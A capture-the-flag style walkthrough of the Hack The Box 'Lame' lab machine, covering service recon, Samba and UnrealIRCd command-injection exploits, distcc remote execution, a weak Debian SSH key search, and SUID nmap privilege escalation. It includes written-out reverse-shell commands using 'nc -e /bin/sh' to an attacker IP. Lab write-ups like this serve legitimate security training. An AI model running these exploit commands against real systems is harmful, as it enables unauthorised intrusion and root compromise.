Lame

Recon

 nmap -p21,22,139,445,3632 -sV -sC -T4 -Pn -oA 10.10.10.3-nmap 10.10.10.3
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-30 05:49 +08
Nmap scan report for beep.htb (10.10.10.3)
Host is up (0.017s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.43
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-01-29T16:50:20-05:00
|_clock-skew: mean: 2h30m54s, deviation: 3h32m20s, median: 45s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.35 seconds

21/tcp open ftp vsftpd 2.3.4 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Looking old

ftp

 searchsploit vsftpd 2.3.4                                           
--------------------------------------------------- ---------------------------------
 Exploit Title                                     |  Path
--------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution          | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metaspl | unix/remote/17491.rb
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Manual ftp exploit (not working) :

nc 10.10.10.3 21 220
(vsFTPd 2.3.4) 
USER 0xdf:) 
331 Please specify the password. 
PASS 0xdf-not-a-password


nc 10.10.10.3 6200

ftp vulnerable code

USER anyname-end-with-smile:) 

samba

searchsploit  samba 3.0.20
--------------------------------------------------- ---------------------------------
 Exploit Title                                     |  Path
--------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security By | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script'  | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow              | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)      | linux_x86/dos/36741.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Manual samba exploit (working) :

smbclient  //lame.htb/tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.43 443`"
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \> 

sudo nc -nvlp 443

Smb vulnerable code

  def exploit

                connect

                # lol?
                username = "/=`nohup " + payload.encoded + "`"
                begin
                        simple.client.negotiate(false)
                        simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
                rescue ::Timeout::Error, XCEPT::LoginError
                        # nothing, it either worked or it didn't ;)
                end

                handler
        end

dstccd

searchsploit distcc
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
DistCC Daemon - Command Execution (Metasploit)                                                                                            | multiple/remote/9915.rb
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.

CVE-2004-2687

wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse

RCE (normal user)

nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-31 04:52 +08
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.042s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)

Bruteforcing ssh public key for breached private keys

git clone https://github.com/g0tmi1k/debian-ssh

cd debian-ssh
cd common_keys

#unzip
tar jxf debian_ssh_rsa_2048_x86.tar.bz2 

cd rsa/2048

#grep recurssive line
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub

suid

 find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls
 
 344956  768 -rwsr-xr-x   1 root     root       780676 Apr  8  2008 /usr/bin/nmap

sh-3.2$ /usr/bin/nmap --interactive     

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root

local services

netstat -tnlp
netstat -ano
netstat -anp

Unreallircd Exploit

ps aux 
root      5622  0.0  0.4   8540  2364 ?        S    06:01   0:08 /usr/bin/unrealircd

sh-3.2$ nc 127.0.0.1 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

Exploit Code

echo "AB; nc -e /bin/sh 10.10.14.43 6767" | nc 127.0.0.1 6697

Listener

nc -nvlp 6767                                                                                                                                                   
listening on [any] 6767 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.3] 39012
whoami
root

Lesson Learnt :

• Remember check for suid

• Enumerate all service and their versions

• Check weird ps that run as root

• Check sensitive readable files (even ssh key)

• You can bruteforce public ssh keys to find matching private key